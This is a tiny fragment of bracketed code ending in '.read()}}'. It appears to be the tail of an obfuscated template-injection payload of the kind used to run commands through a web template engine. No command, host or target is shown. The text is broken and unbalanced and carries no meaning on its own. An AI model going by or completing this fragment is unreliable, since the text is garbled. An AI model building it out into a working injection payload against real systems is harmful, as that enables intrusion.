)+([]==[]))]).read()}}